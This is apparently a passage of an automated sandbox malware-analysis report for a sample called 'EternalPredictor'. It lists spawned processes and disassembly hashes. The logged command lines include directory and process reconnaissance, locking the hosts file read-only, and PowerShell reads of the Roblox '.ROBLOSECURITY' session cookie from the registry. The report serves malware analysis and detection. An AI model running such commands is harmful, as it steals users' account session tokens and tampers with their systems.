                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:78
                                                                                                                                                                                                                                Start time:05:21:35
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:79
                                                                                                                                                                                                                                Start time:05:21:35
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:80
                                                                                                                                                                                                                                Start time:05:21:36
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tree /A /F
                                                                                                                                                                                                                                Imagebase:0x7ff70e8b0000
                                                                                                                                                                                                                                File size:20'992 bytes
                                                                                                                                                                                                                                MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:81
                                                                                                                                                                                                                                Start time:05:21:36
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                Imagebase:0x7ff7cb090000
                                                                                                                                                                                                                                File size:23'040 bytes
                                                                                                                                                                                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:82
                                                                                                                                                                                                                                Start time:05:21:36
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:83
                                                                                                                                                                                                                                Start time:05:21:36
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:84
                                                                                                                                                                                                                                Start time:05:21:36
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:85
                                                                                                                                                                                                                                Start time:05:21:36
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:86
                                                                                                                                                                                                                                Start time:05:21:36
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tree /A /F
                                                                                                                                                                                                                                Imagebase:0x7ff70e8b0000
                                                                                                                                                                                                                                File size:20'992 bytes
                                                                                                                                                                                                                                MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:87
                                                                                                                                                                                                                                Start time:05:21:36
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                Imagebase:0x7ff7cb010000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:88
                                                                                                                                                                                                                                Start time:05:21:38
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:89
                                                                                                                                                                                                                                Start time:05:21:38
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:90
                                                                                                                                                                                                                                Start time:05:21:38
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tree /A /F
                                                                                                                                                                                                                                Imagebase:0x7ff70e8b0000
                                                                                                                                                                                                                                File size:20'992 bytes
                                                                                                                                                                                                                                MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:91
                                                                                                                                                                                                                                Start time:05:21:39
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\XClient.exe"
                                                                                                                                                                                                                                Imagebase:0xa10000
                                                                                                                                                                                                                                File size:71'168 bytes
                                                                                                                                                                                                                                MD5 hash:7439CC991A9A756C41153B8E9121BAAB
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:92
                                                                                                                                                                                                                                Start time:05:21:40
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:93
                                                                                                                                                                                                                                Start time:05:21:40
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:94
                                                                                                                                                                                                                                Start time:05:21:40
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:95
                                                                                                                                                                                                                                Start time:05:21:40
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tree /A /F
                                                                                                                                                                                                                                Imagebase:0x7ff70e8b0000
                                                                                                                                                                                                                                File size:20'992 bytes
                                                                                                                                                                                                                                MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:96
                                                                                                                                                                                                                                Start time:05:21:40
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:97
                                                                                                                                                                                                                                Start time:05:21:41
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:98
                                                                                                                                                                                                                                Start time:05:21:43
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:99
                                                                                                                                                                                                                                Start time:05:21:43
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:100
                                                                                                                                                                                                                                Start time:05:21:43
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:148
                                                                                                                                                                                                                                Start time:05:21:57
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:
                                                                                                                                                                                                                                Has administrator privileges:
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00007FFB4A1204B5 Relevance: .6, Instructions: 618COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1523476833.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4a120000_EternalPredictor.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 555645982332767b2beada399075c3bc2cefa974d0cc753fa2fdc86bbfe815ca
                                                                                                                                                                                                                                  • Instruction ID: d75fe8fd8e7b7831405467f498903ce7974730e0621792c3fff5196619428054
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 555645982332767b2beada399075c3bc2cefa974d0cc753fa2fdc86bbfe815ca
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A55116A2A1DA8A1FF785AFBCC8791B8BBA5FF56210F5441F6D448D7183CD18AC418742
                                                                                                                                                                                                                                  Function 00007FFB4A121131 Relevance: .4, Instructions: 406COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1523476833.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4a120000_EternalPredictor.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 36be22876393db48e2ce8a0d83d2752b2177a30c4be5e01df481b6d78737aa64
                                                                                                                                                                                                                                  • Instruction ID: c6ca92e69675d972ec78d38680f13f12affea0dc9dd1c25081097b286ef258a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36be22876393db48e2ce8a0d83d2752b2177a30c4be5e01df481b6d78737aa64
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3321D872B099494FEB85FB7C88AD6BD7BD2EF99301B0400BAD44DC3693DE24AC018741
                                                                                                                                                                                                                                  Function 00007FFB4A120969 Relevance: .3, Instructions: 271COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1523476833.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4a120000_EternalPredictor.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c2e5e1edd99b82e262fcad40e5a1fa7013c0fb53abefc299a36bbdaa228ac02a
                                                                                                                                                                                                                                  • Instruction ID: 3d8cf504e7ad811b66f059024436d53d8a760f3dcacdf21608e0d1b1a272cb9d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2e5e1edd99b82e262fcad40e5a1fa7013c0fb53abefc299a36bbdaa228ac02a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07A17471A196098FEB98EF78C568BAD7BE1FF55304F2142A9D019E3291CF389C46CB41
                                                                                                                                                                                                                                  Function 00007FFB4A120D90 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1523476833.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4a120000_EternalPredictor.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 43b54b982398fd7af58e856fe69ea9ee2bb6d49a53d34e009f0d8babf34b5542
                                                                                                                                                                                                                                  • Instruction ID: 9a880b978b0ca63ad057109a53a8b28f8a29f4bb1b547f611aa151170cb5c12f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43b54b982398fd7af58e856fe69ea9ee2bb6d49a53d34e009f0d8babf34b5542
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7031786284E3C24FE343AB749CB64A17FB49E5722070A41EBD4C4CB5A3D51CA98AC763
                                                                                                                                                                                                                                  Function 00007FFB4A120498 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1523476833.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4a120000_EternalPredictor.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a751b02dc0f55ccfaf665229ec068b5b850c0d05067a9d62dcf3c64203479a4b
                                                                                                                                                                                                                                  • Instruction ID: 5243c84f13c59bb3cb739514860d3cda3ad63948a7e4f218515374a9cf16be02
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a751b02dc0f55ccfaf665229ec068b5b850c0d05067a9d62dcf3c64203479a4b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F21B071B199094FEB94FB78889D6B976D6EF99301B10007AE80DC3692EE28AC018745
                                                                                                                                                                                                                                  Function 00007FFB4A120F09 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1523476833.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4a120000_EternalPredictor.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c6867c3800e0c523bd93d4d8a53008ac487b508e247ffa861229a4314dbe9cce
                                                                                                                                                                                                                                  • Instruction ID: c79f8efcc80c9ddfa7fb7c0f453ea78471dcefa03028e122bc1c831daa18b907
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6867c3800e0c523bd93d4d8a53008ac487b508e247ffa861229a4314dbe9cce
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB010492A5D58A0BF395AFBC98AA5F4ABC6DF8721074902FAD04EC7293DC0C9C418742
                                                                                                                                                                                                                                  Function 00007FFB4A1204A0 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1523476833.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4a120000_EternalPredictor.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 6590331de2adf7556093acd646bd06a03467ede857ccf0de4c74f66a00bf50d9
                                                                                                                                                                                                                                  • Instruction ID: 827f00704e3a2bee25450bcc279640c206d616a50648cff5eaf33d9edad555be
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6590331de2adf7556093acd646bd06a03467ede857ccf0de4c74f66a00bf50d9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5F0FE93B2D4460BF394BE7D98AD5F997CADF49111F5001B5E50ED3296DC0C9C414245
                                                                                                                                                                                                                                  Function 00007FFB4A120E81 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1523476833.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4a120000_EternalPredictor.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ef0d6ca0dc9bb9bd7b1ab2d778467116272f375c185e74cb70c20774d2e7ab0b
                                                                                                                                                                                                                                  • Instruction ID: e0cdaac8b400b2f47f0692effa4c766112ff2b0cb64a5a5f4870cdcae58d733f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef0d6ca0dc9bb9bd7b1ab2d778467116272f375c185e74cb70c20774d2e7ab0b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B40149B1A2EA994FE745BF3CE46526573D5FF89304B1001BAC849C7392EE2CEC418782
                                                                                                                                                                                                                                  Function 00007FFB4A1204A8 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1523476833.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
